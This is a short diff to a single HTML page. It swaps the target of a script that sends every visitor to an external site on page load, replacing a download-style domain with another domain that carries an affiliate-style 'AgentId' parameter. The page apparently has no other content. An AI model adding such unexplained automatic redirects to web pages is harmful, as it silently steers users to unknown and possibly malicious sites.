--- a/143987.html
+++ b/143987.html
@@ -1,3 +1,3 @@
 <script>
-  window.location.href="https://dl.hawcyy.com/?parent=143987&t=1592638858"
+  window.location.href="https://main.RY872.com/?AgentId=202048"
 </script>
